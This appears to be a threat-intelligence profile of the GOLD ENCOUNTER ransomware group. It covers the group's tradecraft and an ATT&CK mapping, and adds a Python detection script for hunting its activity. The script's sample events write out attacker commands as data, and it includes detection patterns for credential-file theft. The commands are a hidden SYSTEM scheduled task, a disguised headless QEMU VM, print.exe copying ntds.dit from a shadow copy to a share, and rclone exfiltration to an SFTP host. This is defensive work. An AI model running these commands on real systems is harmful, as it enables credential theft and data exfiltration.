Mallory
5 malware families; exploits CVEs in the wild

GOLD ENCOUNTER

Also known as: GOLD ENCOUNTER

GOLD ENCOUNTER is a financially motivated cybercriminal threat group attributed to the PayoutsKing ransomware and double-extortion operation, active since mid-2025. The group steals data and encrypts victim files before demanding payment. Reporting states that PayoutsKing is not run as a ransomware-as-a-service and does not rely on affiliates, although links to former BlackBasta affiliates have been reported. GOLD ENCOUNTER has been linked to the STAC4713 campaign and is described as targeting hypervisors, with encryptors for VMware ESXi environments.

Initial access. Observed methods include targeting exposed Cisco and SonicWall SSL VPN devices, exploitation of the SolarWinds Web Help Desk vulnerability CVE-2025-26399, and email bombing or phishing that leads to Microsoft Teams vishing and abuse of Quick Assist.

Post-compromise activity. The group uses Quick Assist and SuperOps for remote management, DLL sideloading to launch Havoc C2, and SSH backdoors built on AdaptixC2 or OpenSSH. It has also been observed abusing QEMU to run hidden Alpine Linux virtual machines as SYSTEM, including via a scheduled task named TPMProfiler, with disguised virtual disk images, port forwarding and reverse SSH tunnels, so that activity inside the guest stays out of reach of host-based security controls.

Credential access and collection. NTDS.dit and the SAM and SYSTEM hives are copied over SMB using the built-in print command as a living-off-the-land file-copy primitive, and volume shadow copies are used as well.

Exfiltration and evasion. Data theft and staging have involved WinSCP and Rclone, including exfiltration to remote SFTP locations. Defense evasion includes attempts to disable antivirus and EDR with a bring-your-own-vulnerable-driver (BYOVD) technique.

Tooling associated with the group in reporting: PayoutsKing ransomware, QEMU, Havoc C2, AdaptixC2, OpenSSH, Quick Assist, SuperOps, WinSCP, Rclone, Chisel, BusyBox, wg-obfuscator, and WebDAV hosting. Related naming: the ransomware operation is also referred to as the PayoutsKing Group; GOLD ENCOUNTER is the attributed threat group name.
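The scheduled-task, QEMU, print.exe and SFTP tradecraft described above lends itself to a process-creation hunt. The Python below is an added example written for this page, not tooling from the reporting or from Mallory. The event records are constructed to mirror the described behaviour (hosts, paths, users and the task action are made up), the task name TPMProfiler and the print/Rclone/WinSCP usage come from the profile, and the heuristics for a hidden VM (headless or daemonized launch, SYSTEM context, a hostfwd= port forward, a disk image whose extension is not a VM-disk extension, at least two of these before alerting) are my assumptions about what such a launch looks like, not indicators from the reporting.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process creation) records modelled on the tradecraft
# described above; hosts, paths, users and the task action are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe", "User": r"CORP\helpdesk-admin",
     "CommandLine": r'schtasks /create /tn TPMProfiler /sc onstart /ru SYSTEM '
                    r'/tr "C:\ProgramData\Tpm\qemu-system-x86_64.exe"'},
    {"Image": r"C:\ProgramData\Tpm\qemu-system-x86_64.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"qemu-system-x86_64.exe -m 1024 -display none -daemonize "
                    r"-drive file=C:\ProgramData\Tpm\tpmcache.dat,format=qcow2 "
                    r"-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0"},
    {"Image": r"C:\Windows\System32\print.exe", "User": r"CORP\helpdesk-admin",
     "CommandLine": r"print /D:\\10.0.0.5\share\n.dit "
                    r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit"},
    {"Image": r"C:\Users\Public\rclone.exe", "User": r"CORP\helpdesk-admin",
     "CommandLine": r"rclone.exe copy C:\Staging exfil:/upload --sftp-host 203.0.113.10 "
                    r"--sftp-user backup --transfers 8"},
    # Benign controls: a real printer, and an interactive developer VM.
    {"Image": r"C:\Windows\System32\print.exe", "User": r"CORP\alice",
     "CommandLine": r"print /D:LPT1 C:\Users\alice\report.txt"},
    {"Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe", "User": r"CORP\devuser",
     "CommandLine": r"qemu-system-x86_64.exe -m 2048 -hda C:\VMs\dev.qcow2"},
]

VM_DISK_EXT = {".qcow2", ".qcow", ".img", ".raw", ".vmdk", ".vdi", ".vhd", ".vhdx", ".iso"}
HEADLESS = re.compile(r"-nographic\b|-display\s+none\b|-daemonize\b", re.I)
DISK_ARG = re.compile(r"(?:-drive\s+file=|-hd[a-d]\s+)([^\s,]+)", re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^\s"]+)', re.I)
CRED_FILES = re.compile(r"ntds\.dit|\\config\\sam\b|\\config\\system\b", re.I)


def image_name(ev):
    return PureWindowsPath(ev["Image"]).name.lower()


def rule_hidden_qemu_vm(ev):
    # Assumed threshold: two or more signals, so an ordinary interactive VM does not alert.
    if not image_name(ev).startswith("qemu-system"):
        return None
    cmd, reasons = ev["CommandLine"], []
    if HEADLESS.search(cmd):
        reasons.append("headless/daemonized guest")
    if ev["User"].upper().endswith("\\SYSTEM"):
        reasons.append("runs as SYSTEM")
    if "hostfwd=" in cmd.lower():
        reasons.append("host port forwarding")
    disk = DISK_ARG.search(cmd)
    if disk and PureWindowsPath(disk.group(1)).suffix.lower() not in VM_DISK_EXT:
        reasons.append(f"disguised disk image {disk.group(1)}")
    return reasons if len(reasons) >= 2 else None


def rule_suspicious_scheduled_task(ev):
    # schtasks creating the TPMProfiler task from the reporting, or any task launching QEMU.
    cmd = ev["CommandLine"]
    if image_name(ev) != "schtasks.exe" or "/create" not in cmd.lower():
        return None
    m = TASK_NAME.search(cmd)
    name = m.group(1) if m else ""
    if name.lower() == "tpmprofiler" or "qemu" in cmd.lower():
        reasons = [f"task {name or '<unnamed>'} created"]
        if re.search(r"/ru\s+system\b", cmd, re.I):
            reasons.append("runs as SYSTEM")
        return reasons
    return None


def rule_print_lolbin_copy(ev):
    # print.exe with a UNC /D: target is a file copy over SMB, not a print job.
    if image_name(ev) != "print.exe":
        return None
    cmd = ev["CommandLine"]
    target = re.search(r"/d:(\S+)", cmd, re.I)
    if not target or not target.group(1).startswith("\\\\"):
        return None
    reasons = [f"print.exe writing to UNC path {target.group(1)}"]
    if CRED_FILES.search(cmd):
        reasons.append("source is credential material")
    if "harddiskvolumeshadowcopy" in cmd.lower():
        reasons.append("read from shadow copy")
    return reasons


def rule_sftp_exfil(ev):
    # Rclone transfers to any remote, and WinSCP SFTP sessions, started on an endpoint.
    name, cmd = image_name(ev), ev["CommandLine"].lower()
    if name == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd):
        return ["rclone transfer"] + (["SFTP remote"] if "sftp" in cmd else [])
    if name in ("winscp.exe", "winscp.com") and "sftp://" in cmd:
        return ["WinSCP SFTP session"]
    return None


RULES = {
    "hidden_qemu_vm": rule_hidden_qemu_vm,
    "suspicious_scheduled_task": rule_suspicious_scheduled_task,
    "print_lolbin_copy": rule_print_lolbin_copy,
    "sftp_exfil": rule_sftp_exfil,
}


def hunt(events):
    # (event index, rule name, reasons) for every event a rule fires on
    findings = []
    for i, ev in enumerate(events):
        for rule, fn in RULES.items():
            hit = fn(ev)
            if hit:
                findings.append((i, rule, hit))
    return findings


if __name__ == "__main__":
    for i, rule, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {i}: {rule}: {'; '.join(reasons)}")
```

Run against the constructed events, the four malicious records fire one rule each and the two benign controls stay silent. In a real hunt the same fields come from Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled; the TPMProfiler name is worth a dedicated alert, while the two-signal QEMU threshold is a tuning choice that assumes interactive developer VMs are the main source of noise.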


MITRE ATT&CK

Tradecraft

26 distinct techniques observed across reporting, grouped by tactic (35 entries in total, since a technique is listed under every tactic it serves); 11 of the 14 Enterprise ATT&CK tactics are represented. The per-tactic count covers parent techniques only; ×N is the number of intelligence reports citing that technique.

TA0001 Initial Access (4 techniques)
  T1078 Valid Accounts
  T1133 External Remote Services ×3
  T1190 Exploit Public-Facing Application ×3
  T1566 Phishing ×4
    T1566.003 Spearphishing via Service

TA0002 Execution (3 techniques)
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task
  T1059 Command and Scripting Interpreter
  T1569 System Services
    T1569.002 Service Execution

TA0003 Persistence (3 techniques)
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task
  T1078 Valid Accounts
  T1133 External Remote Services ×3

TA0004 Privilege Escalation (2 techniques)
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task
  T1078 Valid Accounts

TA0005 Defense Evasion (3 techniques)
  T1036 Masquerading
  T1078 Valid Accounts
  T1497 Virtualization/Sandbox Evasion ×6

TA0006 Credential Access (1 technique)
  T1003 OS Credential Dumping ×3
    T1003.003 NTDS

TA0007 Discovery (2 techniques)
  T1018 Remote System Discovery
  T1497 Virtualization/Sandbox Evasion ×6

TA0008 Lateral Movement (1 technique)
  T1021 Remote Services
    T1021.002 SMB/Windows Admin Shares
    T1021.004 SSH ×2

TA0011 Command and Control (3 techniques)
  T1090 Proxy
    T1090.002 External Proxy ×2
  T1105 Ingress Tool Transfer
  T1219 Remote Access Tools

TA0010 Exfiltration (3 techniques)
  T1041 Exfiltration Over C2 Channel
  T1048 Exfiltration Over Alternative Protocol ×3
  T1567 Exfiltration Over Web Service

TA0040 Impact (1 technique)
  T1486 Data Encrypted for Impact ×3
IOCs

Observables

5 indicators (domains, IPs, hashes and other artifacts pulled from reporting) are attributed to this actor. IOC values are gated: they are available in Mallory, where they can also be exported directly to a SIEM.

Also held in Mallory for this actor: the tradecraft mapping (26 techniques), the malware arsenal (5 families, with IOCs and behaviour), exploited CVEs (1), detection signatures (YARA, Sigma, Snort and vendor rules), and the observables (5), together with sector, geography and tech-stack overlap against a subscriber's own footprint.